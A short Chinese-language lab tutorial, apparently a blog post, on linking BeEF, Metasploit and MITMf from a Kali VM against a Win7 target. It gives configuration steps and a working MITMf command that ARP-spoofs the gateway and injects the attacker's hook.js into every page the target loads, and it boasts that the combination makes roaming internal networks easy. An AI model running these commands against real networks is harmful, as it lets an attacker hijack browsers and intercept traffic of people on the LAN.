Beef+Metasploit+Mitmf

环境:

IP

Kali(虚拟机):192.168.1.130

Win7: 192.168.1.142

虚拟机和主机使用桥接模式,

Beef在kali下自带所以咱们直接配置就行了,不需要下载。

首先进入beef的配置文件,

输入/用以在配置文件中搜索metasploit

输入i键编辑

将metasploit设置为打开

原来这里是fales,

然后Esc键退出,按下shift :再次输入wq保存并退出。

进入beef下的extensions/metasploit目录,并用vim打开config.yaml配置文件,

然后将host项的IP改为kali的本机IP

在这里填入metasploit-framework路径。

现在beef基本设置完成,下来打开msfconsole,刚才已经设置启动

metasploit,现在打开metasploit会与beef进行联动。

load msgrpc ServerHost=192.168.1.130 Pass=abc123

这样msf也配置完成了,这个页面不要关闭。重新打开一个页面找到beef目录,运行beef

Beef后台地址,

账号密码beef beef,

到此beef也算配置完成了。

最后下载安装mitmf

命令mitmf --spoof --arp -ieth0 --gateway 192.168.1.2 --target 192.168.1.142 --inject --js-urlhttp://192.168.1.130:3000/hook.js将靶机所有访问页面注入js

如果有错误可以参考油管这两个视频修复:

https://www.youtube.com/watch?v=4x8utVNvM5c

https://www.youtube.com/watch?v=4a6Bf1WXqqI

在靶机随意打开一个页面

看一下MITMF

最后在beef确认一下

完美上线!

相关mitmfmetasploit beef联动后的作用和其他使用方法可百度查找。这三样可以一起运作可谓是内网大杀器!!!畅游内网不成问题!